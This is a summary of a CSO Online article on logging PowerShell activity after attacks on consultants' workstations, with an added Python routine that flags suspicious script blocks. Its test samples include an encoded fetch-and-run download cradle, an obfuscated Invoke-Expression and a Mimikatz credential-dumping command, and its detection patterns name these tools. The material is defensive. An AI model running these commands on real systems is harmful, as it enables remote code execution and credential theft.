How to log and monitor PowerShell activity for suspicious scripts and commands

Source: How to log and monitor PowerShell activity for suspicious scripts and commands | CSO Online

Author: unknown

URL: https://www.csoonline.com/article/4006326/how-to-log-and-monitor-powershell-activity-for-suspicious-scripts-and-commands.html

ONE SENTENCE SUMMARY:

Attackers exploit consultants’ systems using legitimate tools and remote access methods, highlighting the need for enhanced workstation protection strategies.

MAIN POINTS:

  1. Consultants’ computers are attractive targets due to their access across multiple organizations.
  2. A recent attack involved installing Alpha Agent and updating Splashtop to gain remote access.
  3. Attackers employed legitimate tools and normal processes, avoiding antivirus detection.
  4. The entry point of the initial attack remains unknown.
  5. Adjust attack surface reduction rules to prevent common attack techniques.
  6. Enable PowerShell script logging via Group Policy or Intune for monitoring.
  7. Regularly review logs for suspicious scripts, encoding, and obfuscation techniques.
  8. Microsoft Defender for Cloud can detect suspicious PowerShell and script activities.
  9. Maintain awareness of authorized remote access tools and restrict unauthorized ones.
  10. Monitor consultant workstations closely to detect abnormal activities quickly.
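The log review in points 6 and 7, as an added example that is not part of the CSO Online article: a small Python triage routine over constructed PowerShell script block log entries (the ScriptBlockText of event ID 4104). It reports -EncodedCommand use, decodes the base64/UTF-16LE payload and scans it as well, and flags common obfuscation and credential-access patterns. The sample entries, pattern names and regexes are constructed for this illustration and should be tuned before use in a real environment.

```python
import base64
import re

# Constructed ScriptBlockText samples modelled on PowerShell event ID 4104 (written to
# Microsoft-Windows-PowerShell/Operational once Script Block Logging is enabled by policy).
_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')"
    .encode("utf-16-le")).decode("ascii")
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem C:\\Reports | Sort-Object LastWriteTime",
    "powershell.exe -nop -w hidden -EncodedCommand " + _PAYLOAD,
    "$a='In'+'voke'+'-Ex'+'pression'; & $a ([char]73+[char]69+[char]88)",
    "Invoke-Mimikatz -Command 'sekurlsa::logonpasswords'",
]

# -EncodedCommand (and its -e/-ec/-enc short forms) takes base64 of UTF-16LE text.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Cheap, explainable indicators of obfuscation or abuse; tune them per environment.
OBFUSCATION_PATTERNS = {
    "string-concatenation": re.compile(r"'[-\w]+'\s*\+\s*'[-\w]+'"),
    "char-cast": re.compile(r"\[char\]\s*\d+", re.I),
    "backtick-escape": re.compile(r"\w`\w"),
    "invoke-expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "download-cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest", re.I),
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
}
CREDENTIAL_PATTERN = re.compile(r"sekurlsa|lsass|mimikatz", re.I)

def decode_encoded_command(block):
    """Return the plaintext of an -EncodedCommand payload, or None if absent/malformed."""
    match = ENCODED_FLAG.search(block)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed payload; the flag itself is still reported below

def analyze_script_block(block):
    """Classify one script block; a decoded -EncodedCommand payload is scanned too."""
    findings = []
    decoded = decode_encoded_command(block)
    text = block + ("\n" + decoded if decoded else "")
    if ENCODED_FLAG.search(block):
        findings.append("encoded-command")
    findings += [name for name, pat in OBFUSCATION_PATTERNS.items() if pat.search(text)]
    if CREDENTIAL_PATTERN.search(text):
        findings.append("credential-access")
    return {"findings": findings, "decoded": decoded}
```

Note that the obfuscated third sample matches no keyword at all until the concatenation and [char] casts are counted, which is why keyword-only review of script block logs is not enough.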

TAKEAWAYS:

  1. Tighten security rules to block execution of potentially malicious scripts.
  2. Enable detailed PowerShell logging on all critical workstations.
  3. Regularly analyze logs for unusual activities or attempts to harvest credentials.
  4. Clearly document approved remote access tools and restrict unauthorized installations.
  5. Increase monitoring and alerts specifically on consultant machines accessing internal resources.